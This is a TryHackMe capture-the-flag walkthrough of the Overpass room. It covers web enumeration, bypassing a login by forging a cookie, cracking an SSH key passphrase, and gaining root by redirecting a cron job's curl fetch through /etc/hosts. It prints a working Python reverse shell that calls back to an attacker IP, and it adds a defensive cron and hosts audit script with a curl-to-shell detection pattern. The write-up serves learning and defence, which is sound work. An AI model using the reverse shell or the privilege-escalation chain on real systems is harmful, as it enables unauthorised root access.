Overpass — TryHackMe: Walkthrough 🏴

Jovanski Wisuda
4 min read, Sep 5, 2023


What happens when some broke CompSci students make a password manager?

I created this walkthrough for documentation purposes, to make sure I remember what I’ve learned in this room. I do this for write-up and grammar practice, lol. Let’s rock and happy hacking 🤘

Room URL: https://tryhackme.com/room/overpass
Machine IP Address: 10.10.228.4

The first thing to do is port scanning, and nmap is the tool for that. It shows two open ports: SSH and HTTP.

Since there are no hints for SSH, I tried accessing the website, and indeed, I was able to access it.

I proceeded with enumeration using the gobuster tool, and I found that there is a /admin directory.

Upon accessing /admin, I found a login page, but neither command injection nor SQL injection worked against it.

I attempted to inspect the web page, and I found some interesting information. There’s a login() function here.

I tried bypassing the login by manually creating the same cookie that login() sets and then refreshing the page.

Here, I found a hint in the form of a “private key” and also a username, James, which seems like it will be useful later.

I saved the private key to a file and tried to SSH in with the username and that key. But there was one problem: I didn’t know the key’s passphrase.

To get past the passphrase, I used ssh2john to extract a crackable hash from the key and recovered the passphrase from it, and it worked.

I tried SSH access again, and boom… I successfully logged in.

I explored further and found a text file named “todo” and also discovered the first flag.

Answer:

I went looking for the second flag, but this user clearly did not have root access. So I checked the crontab and found a cron job running every minute. How could this be exploited? The job used curl to retrieve “buildscript.sh.”

I checked the /etc/hosts file and changed the entry for “overpass.thm” to point at my own IP address.

I then created a local file at the same path the cron job requests, containing a reverse shell:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.0.54",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

I set up a netcat listener on my machine.

I started my local web server, and it worked! The cron job fetched my reverse shell.

Back at the netcat listener, I had a shell with root privileges :) Of course, I grabbed the second flag in the process!
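As an added, defender-side example (not code from the room or the author), this Python audit flags the two conditions that made the privilege escalation above possible: a system cron entry that pipes a curl/wget download straight into a shell, and an /etc/hosts file that users other than root can modify. The regex, the sample crontab and the severity labels are my own constructions.

```python
"""Audit helpers for the two weaknesses chained in the Overpass room: a root
cron job that fetches a script over plain HTTP and pipes it into a shell, and
an /etc/hosts file that unprivileged users can edit to redirect that fetch.
Example code added to this walkthrough; not from the room or TryHackMe."""
import re
import stat
from typing import Dict, List

# A cron command that downloads something and pipes it straight into a shell.
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")

def audit_crontab(lines: List[str]) -> List[Dict]:
    """One finding per /etc/crontab line that fetches and executes remote
    content. System crontab lines carry a user field before the command."""
    findings = []
    for lineno, raw in enumerate(lines, 1):
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        if not FETCH_AND_RUN.search(line):
            continue
        fields = line.split(None, 6)  # m h dom mon dow user command
        user = fields[5] if len(fields) == 7 else "?"
        findings.append({
            "line": lineno,
            "user": user,
            # A bare hostname makes curl default to HTTP: whoever controls
            # name resolution then controls what root executes.
            "insecure_transport": "https://" not in line,
            "severity": "critical" if user == "root" else "high",
        })
    return findings

def hosts_is_writable_by_others(mode: int) -> bool:
    """True if group or other can write /etc/hosts (mode from os.stat), which
    lets a low-privileged user repoint the hostname the cron job fetches."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

# Constructed sample modelled on the room's crontab, not a real capture.
SAMPLE_CRONTAB = [
    "SHELL=/bin/sh",
    "# m h dom mon dow user  command",
    "17 * * * * root cd / && run-parts --report /etc/cron.hourly",
    "* * * * * root curl overpass.thm/buildscript.sh | bash",
]

if __name__ == "__main__":
    for finding in audit_crontab(SAMPLE_CRONTAB):
        print(finding)
    print("hosts writable by others:", hosts_is_writable_by_others(0o100646))
```

On a real host, feed it the lines of /etc/crontab (plus /etc/cron.d/*) and the st_mode from os.stat("/etc/hosts"); the fix is to pin the fetch to HTTPS with a verified certificate (or ship the script locally) and keep /etc/hosts at mode 644.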

Conclusion:

With that, the Overpass room is complete.

Stay connected with me! Feel free to reach out through my social media

LinkedIn: www.linkedin.com/in/jovanskiprmwsd

TryHackMe: https://tryhackme.com/p/un533nc0w

Email: jovanski.wisuda@gmail.com
